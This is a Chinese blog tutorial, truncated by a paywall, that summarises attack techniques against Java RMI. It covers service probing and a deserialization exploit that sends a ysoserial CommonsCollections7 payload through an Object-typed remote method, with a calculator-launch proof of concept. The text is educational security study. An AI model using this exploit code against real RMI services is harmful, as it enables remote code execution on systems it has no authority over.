一文回顾攻击Java RMI方式

最新推荐文章于 2023-08-23 21:45:00 发布
VIP文章 最新推荐文章于 2023-08-23 21:45:00 发布
阅读量709 收藏 1
点赞数
文章标签: java 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zybb166/article/details/122410174
版权

前序

RMI存在着三个主体

  • RMI Registry
  • RMI Client
  • RMI Server

而对于这三个主体其实都可以攻击,当然了需要根据jdk版本以及环境寻找对应的利用方式。

Ps.在最初接触的RMI洞是拿着工具一把梭,因此在以前看来笔者以为RMI是一个服务,暴露出端口后就可以随意攻击,现在看来是我才疏学浅了,对于RMI的理解过于片面了。本文是笔者在学习RMI的各种攻击方式后的小结,若有错误,请指出。

Ps1.本文并无任何新知识点,仅仅是对于各位师傅文章的一个小总结。

RMI为何

关于RMI可以阅读: 从懵逼到恍然大悟之Java中RMI的使用_lmy86263的博客-CSDN博客_java rmi server

RMI全称是Remote Method Invocation(远程⽅法调⽤),目的是为了让两个隔离的java虚拟机,如虚拟机A能够调用到虚拟机B中的对象,而且这些虚拟机可以不存在于同一台主机上。

开头处说到了RMI的三种主体,那么以一个简单的Demo来理解RMI通信的流程。

RMI中主要的api大致有:

java.rmi
java.rmi.server
java.rmi.registry

首先就服务端而言,需要提供远程对象给与客户端远程调用,所谓远程对象即实现java.rmi.Remote接口的类或者继承了java.rmi.Remote接口的所有接口的远程对象。

例如远程接口如下:

package com.hhhm.rmi;

import java.rmi.Remote;
import java.rmi.RemoteException;

public interface HelloRImpl extends Remote {
    String hello() throws RemoteException;
    String test() throws RemoteException;
}

需要有一个实现该接口的类:

package com.hhhm.rmi;

import java.rmi.RemoteException;
import java.rmi.server.UnicastRemoteObject;

public class HelloR extends UnicastRemoteObject implements HelloRImpl{
    protected HelloR() throws RemoteException {
    }

    @Override
    public String hello() throws RemoteException {
        System.out.println("hello world");
        return "hello";
    }

    @Override
    public String test() throws RemoteException {
        System.out.println("just test");
        return "test";
    }
}

首先有几个关键点:

  • 实现方法必须抛出RemoteException异常
  • 实现类需要同时继承UnicastRemoteObject类
  • 只有在接口中声明的方法才能被调用到

那么首先需要开启一个RMI Registry,开启方式也很简单,在 $JAVA_HOME/bin/ 下有一个rmiregistry,因此我们可以直接利用它来开启一个Registry。

rmiregistry 1099

Tips:rmiregistry需要运行在项目的target/classes目录下,否则server端会爆出:

java.lang.ClassNotFoundException: com.hhhm.rmi.HelloR

当然了也可以直接使用代码来实现一个registry:

LocateRegistry.createRegistry(1099);

就服务端而言其实现的关键在于Naming这个类,利用bind方法将对象绑定一个名,为了方便我直接将Server和Registry放到一起:

package com.hhhm.rmi;

import org.junit.Test;
import java.rmi.Naming;
import java.rmi.registry.LocateRegistry;

public class HelloRmiServer {

    public static void main(String[] args) {
        HelloR helloR = null;
        try{
            LocateRegistry.createRegistry(1099);
            helloR = new HelloRImpl();
            Naming.bind("rmi://127.0.0.1:1099/hell",helloR);
            //Naming.bind("rmi://127.0.0.1:1099/hello",helloR);
        }catch (Exception e) {
            e.printStackTrace();
        }
    }
}

默认地会去绑定到localhost的1099端口,也可以指定绑定的ip、端口。

客户端的操作可变性就很多了,同样是通过Naming类中提供的方法来操作,有如下几种方法:

  • lookup
  • list
  • bind
  • rebind
  • unbind

此处就存在有如利用unbind去解绑掉注册对象,利用bind绑定到恶意端达成攻击,此处暂且不提,回到主线,客户端同样是几行代码搞定:

package com.hhhm.rmi;

import org.junit.Test;

import java.rmi.Naming;

public class HelloRmiClient {

    @Test
    public void run() throws Exception{
        String[] clazz = Naming.list("rmi://127.0.0.1:1099");
        for (String s:clazz) {
            System.out.println(s);
        }
    }
}
//opt://127.0.0.1:1099/hell

探测RMI服务接口

在未知接口的情况下,除了使用list之外,还有其他方式能够获取到更详细的接口信息,其中有一个工具有做到了这一个效果: https://github.com/NickstaDB/BaRMIe

其效果大致如下:

而实际上nmap中也实现了这一功能:

其原理在: https://xz.aliyun.com/t/7930#toc-3,从文章摘抄出来总结:

LocateRegistry.getRegistry
reg.list()
reg.unbind(unbindName);
reg.lookup(objectNames[i]);

而其攻击的方式也就是根据返回的classname判断是否存在已知组件的危险服务,然后对其尝试进行攻击,所以显得这个漏洞有些没有营养,那么再看看其他攻击方式。

在已知接口的调用方式下进行攻击

其实也属于比较鸡肋的漏洞,因为在已知接口的调用方式这种情况确实比较少见,所谓已知接口的调用方式即指的是例如我们上面通过探测端口可知访问该接口的方式为:

rmi://127.0.0.1:1099/hell

同时类名为HelloR,但我们在没有服务端源码的情况下是不清楚HelloR接口下有哪些方法可以被调用,当然了这些方法的参数类型更是无从得知,不过在已知接口调用方式的情况下确实是可以利用这一方式达成攻击的。

此种需要分开为两种情况:

  • 参数为Object类
  • 参数非Object类

详细参考: https://xz.aliyun.com/t/7930#toc-6

其一是为何在传输Object类的参数时都会在服务端反序列化,其关键代码位于:

sun.rmi.server.UnicastServerRef#dispatch(Jdku66):

其中var4是用于校验客户端调用的方法是否与服务端存在的一致,否则会爆出:

unrecognized method hash: method not supported by remote object

var4暂且不提,服务端对于Object类型参数反序列化的点位于unmarshalValue函数内:

protected static Object unmarshalValue(Class<?> var0, ObjectInput var1) throws IOException, ClassNotFoundException {
        if (var0.isPrimitive()) {
            if (var0 == Integer.TYPE) {
                return var1.readInt();
            } else if (var0 == Boolean.TYPE) {
                return var1.readBoolean();
            } else if (var0 == Byte.TYPE) {
                return var1.readByte();
            } else if (var0 == Character.TYPE) {
                return var1.readChar();
            } else if (var0 == Short.TYPE) {
                return var1.readShort();
            } else if (var0 == Long.TYPE) {
                return var1.readLong();
            } else if (var0 == Float.TYPE) {
                return var1.readFloat();
            } else if (var0 == Double.TYPE) {
                return var1.readDouble();
            } else {
                throw new Error("Unrecognized primitive type: " + var0);
            }
        } else {
            return var1.readObject();
        }
    }

易知在参数不是基本数据类型时会进入到else,从而进入到readObject做反序列化操作。

因此打object类型的方法很简单,直接用yso生成object对象,调用即可,例如上文讲到的的HelloR类新增一个参数为object类的方法

void helloObject(Object payload) throws RemoteException;

通过lookup调用方法然后把payload传递过去即可

package com.hhhm.rmi;

import ysoserial.payloads.ObjectPayload;

import java.rmi.Naming;

public class AttackInterTypeofObject {
    public static void main(String[] args) {
        String payloadType = "CommonsCollections7";
        String payloadArg = "open /System/Applications/Calculator.app";
        Object payloadObject = ObjectPayload.Utils.makePayloadObject(payloadType, payloadArg);
        HelloR helloR = null;
        try{
            helloR = (HelloR) Naming.lookup("rmi://127.0.0.1:1099/hell");
            helloR.helloObject(payloadObject);
        }catch (Exception e){
            e.printStackTrace();
        }

    }
}

其二是绕过Object类型参数的方式比较有趣,重点在于绕过method hash。

上面说到了,在Client端直接修改参数为Object时会爆出unrecognized method hash的错误,而在使用wireshark是可以直接抓到这一个method hash,这意味着method hash的值是我们可控的,也就是说我们完全可以通过修改客户端来实现攻击的利用,在: Attacking Java RMI services after JEP 290 | MOGWAI LABS 一文中对此也做出了总结:

  • 将 java.rmi 包的代码复制到一个新的包中,并在那
最低0.47元/天 解锁文章
阿伦Java
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
RMI.rar_Java RMI
09-24
学习java RMI 很好的例子,入门程序
Java rmi 找不到方法,获取java.rmi.UnmarshalException:无法识别的方法哈希:远程对象不支持的方法...
weixin_33907300的博客
03-01 844
I am new to RMI technology.When I am running the rmi client program, I am getting the exception : java.rmi.UnmarshalException: unrecognized method hash: method not supported by remote object.I am usin...
Java RMI漏洞利用(1099/1090对外开放-rce)
yggcwhat
01-18 1752
Java RMI漏洞利用(1099/1090对外开放-rce)
RMI-攻击方式总结
最新发布
Karka_的博客
08-23 127
RMI,是Remote MethodInvocation(远程方法调用)的缩写,即在一个JVM中java程序调用在另一个远程JVM中运行的java程序,这个远程JVM既可以在同一台实体机上,也可以在不同的实体机上,两者之间通过网络进行通信。javaRMI封装了远程调用的实现细节,进行简单的配置之后,就可以如同调用本地方法一样,比较透明地调用远端方法。RMI包括以下三个部分:Registry:提供服务注册与服务获取。
【入坑JAVA安全】怎么攻击RMI应用?
一个安全研究员
04-15 1749
既然你诚心诚意的问了,那我就大发慈悲的告诉你
java rmi demo
11-28
java rmi入门级实例:分为三个javase项目,rmi-api(存放公共的接口和实体),rmi-server(rmi服务器端),rmi-client(rmi客户端),其中服务端和客户端都依赖rmi-api项目
java_rmi.rar_RMI java_java.rmi
09-19
Java编程rmi实例,给出远程方法调用技术在java方面的具体例子。
RMI.zip_Java RMI_rmi
09-23
Java RMI Calculator Java RMI calculator
RMI-Java.rar_Java RMI
09-14
this is sample code in RMI-java
attackRMI.jar
11-28
attackRMI.jar
java.rmi.UnmarshalException: invalid method hash
FreeJVM
07-30 493
今天在应用程序中报了下面异常: [code="java"] java.rmi.ServerException: RemoteException occurred in server thread; nested exception is: java.rmi.UnmarshalException: invalid method hash at sun.rmi.server.Unicas...
RMI [java.rmi.UnmarshalException] 问题解决
热门推荐
宣兆鹏Robin的专栏
03-20 3万+
未经本人许可,不得转载该文! 错误描述: java.rmi.UnmarshalException: error unmarshalling return; nested exception is:     java.lang.ClassNotFoundException: compute.ComputeEngine (no security manager: RMI clas
Java RMI学习与解读(二)
qigeminghao的博客
10-30 523
写在前面# 接上篇文章,这篇主要是跟着看下整个RMI过程中的源码并对其做简单的分析 RMI源码分析# 还是先回顾RMI流程: 创建远程对象接口(RemoteInterface) 创建远程对象类(RemoteObject)实现远程对象接口(RemoteInterface)并继承UnicastRemoteObject类 创建Registry&Server端,一般Registry和Server都在同一端。 创建注册中心(Registry)LocateRegistry.getRegistry
安全攻击原理详解(一) -- RMI
saodiseng_a的博客
12-23 1162
1. RMI 1.1 JAVA RMI 1.1.1 基本概念 RMI(Remote Method Invocation,远程方法调用)。远程方法调用是分布式编程中的一个基本思想,实现远程方法调用的技术有CORBA、WebService等(这两种独立于编程语言)。RMI则是专门为JAVA设计,依赖JRMP通讯协议。 RMI可以使我们引用远程主机上的对象,将JAVA对象作为参数传递,而这些对象要可以被序列化。就像C语言中有RPC(remote procedure calls )使远程主机上执行C函数并返回
Java代码审计——RMI攻击方式纲要
王嘟嘟的博客
02-13 836
0x00 前言 反序列化总纲 在看了网上公开的文章,觉得自己分析的内容过于短浅,所以特重新针对RMI攻击方式进行整理和总结。这里按照使用或者攻击场景来进行学习和分析 0x01 探测发现 1. 场景 定向攻击RMI,但是还没有目标,此时就需要找到一个目标。 2.工具: https://github.com/NickstaDB/BaRMIe nmap 0x02 攻击server端 场景1 知道目标server绑定的类 确定目标绑定的类存在Object参数 攻击方式 通过直接将gadget传入的方式就可以
java渗透测试基础之——RMI
Thunderclap的博客
02-10 928
RMI全称是Remote Method Invocation(远程方法调用),是专为Java环境设计的远程方法调用机制,远程服务器提供API,客户端根据API提供相应参数即可调用远程方法。由此可见,使用RMI时会涉及到参数传递和结果返回,参数为对象时,要求对象可以被序列化。目的是为了让两个隔离的java虚拟机,如虚拟机A能够调用到虚拟机B中的对象,而且这些虚拟机可以不存在于同一台主机上。RMI ClientRMI Serverjava.rmi:提供客户端需要的类、接口和异常;
RMI反序列漏洞复现-——手把手光速复现,工具超全
weixin_37771454的博客
03-24 2940
RMI反序列漏洞复现-手把手光速复现,工具超全一、靶机部署:二、本机怎样查看是不是可以回显?三、attackRMI利用 RMI是REMOTE METHOD INVOCATION的简称,是J2SE的一部分,能够让程序员开发出基于JAVA的分布式应用。一个RMI对象是一个远程JAVA对象,可以从另一个JAVA虚拟机上(甚至跨过网络)调用它的方法,可以像调用本地JAVA对象的方法一样调用远程对象的方法,...
java debug print对象_summer的java二货debug血泪史~ | 学步园
weixin_30794755的博客
02-28 244
java.io.WriteAbortedException: writing aborted; java.io.NotSerializableException: po.UserPO描述:Tomcat在内部实现的时候,会有一个机制,那就是当Tomcat服务器停止后,tomcat会将内存中的信息写到硬盘上,当我们重启服务器的时候,他会将硬盘上序列化文件重新读入内存中,以此来保证session的共享,...
java rmi 数据库
05-14
对于数据库应用而言,Java RMI可以通过网络将客户端与服务器连接起来,并提供一种基于Java的分布式数据库交互方式。 使用Java RMI来连接数据库,可以使得客户端和服务器端的计算机分别处于不同的地点,甚至可以位于...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值